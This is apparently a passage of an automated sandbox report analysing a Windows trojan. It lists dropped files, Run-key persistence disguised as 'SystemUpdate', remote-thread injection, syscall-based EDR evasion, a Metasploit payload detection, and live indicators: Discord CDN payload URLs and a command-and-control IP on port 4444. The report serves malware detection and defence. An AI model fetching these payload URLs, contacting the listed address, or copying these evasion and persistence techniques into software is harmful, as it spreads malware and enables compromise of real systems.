      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: sNifdpWiY9.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: sNifdpWiY9.exeStatic file information: File size 3188321 > 1048576
      Source: sNifdpWiY9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CAC10 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_00007FF75F8CAC10
      Source: sNifdpWiY9.exeStatic PE information: section name: .xdata
      Source: sNifdpWiY9.exeStatic PE information: section name: /4
      Source: sNifdpWiY9.exeStatic PE information: section name: /19
      Source: sNifdpWiY9.exeStatic PE information: section name: /31
      Source: sNifdpWiY9.exeStatic PE information: section name: /45
      Source: sNifdpWiY9.exeStatic PE information: section name: /57
      Source: sNifdpWiY9.exeStatic PE information: section name: /70
      Source: sNifdpWiY9.exeStatic PE information: section name: /81
      Source: sNifdpWiY9.exeStatic PE information: section name: /97
      Source: sNifdpWiY9.exeStatic PE information: section name: /113
      Source: antietat[1].exe.0.drStatic PE information: section name: .xdata
      Source: systemupdate.exe.0.drStatic PE information: section name: .xdata
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3FE832 push rsp; ret 9_2_000001DE4A3FE839
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A3F6558 push rsp; ret 9_2_000001DE4A3F6559
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeFile created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeJump to dropped file
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\antietat[1].exeJump to dropped file
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdateJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdateJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4269F8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_000001DE4A4269F8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeAPI coverage: 3.2 %
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeAPI coverage: 6.8 %
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeAPI coverage: 1.8 %
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeAPI coverage: 2.6 %
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeAPI coverage: 1.8 %
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeAPI coverage: 2.6 %
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: sNifdpWiY9.exe, 0000000C.00000002.1381605105.0000020AE3936000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E2349000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp$
      Source: sNifdpWiY9.exe, 00000000.00000003.1296880059.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298113649.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23FC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FCE000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: sNifdpWiY9.exe, 00000000.00000003.1296880059.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298113649.00000202F4367000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV.r@
      Source: sNifdpWiY9.exe, 00000000.00000002.1297883211.00000202F42F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: systemupdate.exe, 00000009.00000002.2494505334.000001DE4A458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CF8B0 free,IsDebuggerPresent,RaiseException,mbstowcs,malloc,mbstowcs,free,0_2_00007FF75F8CF8B0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42C170 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,9_2_000001DE4A42C170
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CAC10 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_00007FF75F8CAC10
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A423C58 GetProcessHeap,HeapAlloc,VirtualAllocEx,WriteProcessMemory,HeapFree,9_2_000001DE4A423C58
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,0_2_00007FF75F8B11E7
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CB039 SetUnhandledExceptionFilter,0_2_00007FF75F8CB039
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F9D1918 SetUnhandledExceptionFilter,0_2_00007FF75F9D1918
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC321180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,exit,_amsg_exit,9_2_00007FF6EC321180
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC328621 SetUnhandledExceptionFilter,9_2_00007FF6EC328621
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC32F2D8 SetUnhandledExceptionFilter,VirtualAlloc,9_2_00007FF6EC32F2D8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4173FC GetModuleHandleW,SetUnhandledExceptionFilter,ExitProcess,ExitThread,9_2_000001DE4A4173FC
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A42B7A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001DE4A42B7A8
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 12_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,12_2_00007FF75F8B11E7
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,16_2_00007FF75F8B11E7
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F8CB039 SetUnhandledExceptionFilter,16_2_00007FF75F8CB039
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 16_2_00007FF75F9D1918 SetUnhandledExceptionFilter,16_2_00007FF75F9D1918
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 19_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,19_2_00007FF75F8B11E7
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8B11E7 SetUnhandledExceptionFilter,malloc,strlen,malloc,_initterm,_amsg_exit,22_2_00007FF75F8B11E7
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F8CB039 SetUnhandledExceptionFilter,22_2_00007FF75F8CB039
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 22_2_00007FF75F9D1918 SetUnhandledExceptionFilter,22_2_00007FF75F9D1918

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A41669C VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,9_2_000001DE4A41669C
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeNtAllocateVirtualMemory: Indirect: 0x1DE4A3D9DBEJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeNtProtectVirtualMemory: Indirect: 0x1DE4A3D9E0FJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8B157F GetModuleFileNameA,GetLastError,MessageBoxA,ShellExecuteExA,ExitProcess,0_2_00007FF75F8B157F
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A419CB4 AllocateAndInitializeSid,SetEntriesInAclW,AllocateAndInitializeSid,LocalAlloc,InitializeAcl,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,9_2_000001DE4A419CB4
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8B14BE AllocateAndInitializeSid,CheckTokenMembership,CheckTokenMembership,FreeSid,0_2_00007FF75F8B14BE
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A41AD88 CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,ConnectNamedPipe,GetLastError,CloseHandle,9_2_000001DE4A41AD88
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8CC4C0 GetSystemTimeAsFileTime,0_2_00007FF75F8CC4C0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4132C0 GetVersionExW,GetLastError,SetLastError,VirtualAlloc,VirtualAlloc,GetLastError,SetLastError,VirtualFree,VirtualFree,9_2_000001DE4A4132C0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A41B658 bind,WSAGetLastError,listen,accept,closesocket,9_2_000001DE4A41B658
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Exploitation for Privilege Escalation
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      21
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Access Token Manipulation
      1
      Access Token Manipulation
      LSASS Memory31
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
      Process Injection
      12
      Process Injection
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Abuse Elevation Control Mechanism
      1
      Deobfuscate/Decode Files or Information
      NTDS15
      System Information Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
      Registry Run Keys / Startup Folder
      1
      Abuse Elevation Control Mechanism
      LSA SecretsInternet Connection DiscoverySSHKeylogging13
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
      DLL Side-Loading
      3
      Obfuscated Files or Information
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569044 Sample: sNifdpWiY9.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 92 42 cdn.discordapp.com 2->42 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Yara detected Metasploit Payload 2->54 56 4 other signatures 2->56 8 sNifdpWiY9.exe 1 18 2->8         started        12 sNifdpWiY9.exe 2 2->12         started        14 sNifdpWiY9.exe 2 2->14         started        signatures3 process4 dnsIp5 44 cdn.discordapp.com 162.159.134.233, 443, 49700, 49701 CLOUDFLARENETUS United States 8->44 36 C:\Users\user\AppData\...\systemupdate.exe, PE32+ 8->36 dropped 38 C:\Users\user\AppData\...\antietat[1].exe, PE32+ 8->38 dropped 16 systemupdate.exe 1 8->16         started        20 conhost.exe 8->20         started        22 sNifdpWiY9.exe 14 12->22         started        24 conhost.exe 12->24         started        26 sNifdpWiY9.exe 14 14->26         started        28 conhost.exe 14->28         started        file6 process7 dnsIp8 40 89.84.63.139, 4444, 49702, 49746 BOUYGTEL-ISPFR France 16->40 46 Contains functionality to inject threads in other processes 16->46 48 Found direct / indirect Syscall (likely to bypass EDR) 16->48 30 conhost.exe 16->30         started        32 conhost.exe 22->32         started        34 conhost.exe 26->34         started        signatures9 process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      sNifdpWiY9.exe11%ReversingLabsWin64.Trojan.Sonbokli
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\antietat[1].exe3%ReversingLabs
      C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe3%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      89.84.63.1390%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      cdn.discordapp.com
      162.159.134.233
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&false
          high
          https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&false
            high
            89.84.63.139true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://gcc.gnu.org/bugs/):sNifdpWiY9.exefalse
              high
              https://cdn.discordapp.com/sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://cdn.discordapp.com/nsNifdpWiY9.exe, 00000000.00000003.1296804041.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c6ConDrv.0.dr, ConDrv.16.dr, ConDrv.22.drfalse
                    high
                    https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528ConDrv.22.drfalse
                      high
                      https://cdn.discordapp.com/VsNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://crl.micsNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          89.84.63.139
                          unknownFrance
                          5410BOUYGTEL-ISPFRtrue
                          162.159.134.233
                          cdn.discordapp.comUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1569044
                          Start date and time:2024-12-05 11:40:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 49s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:26
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:sNifdpWiY9.exe
                          renamed because original name is a hash value
                          Original Sample Name:2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c.exe
                          Detection:MAL
                          Classification:mal92.troj.evad.winEXE@13/8@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 82%
                          • Number of executed functions: 17
                          • Number of non-executed functions: 158
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
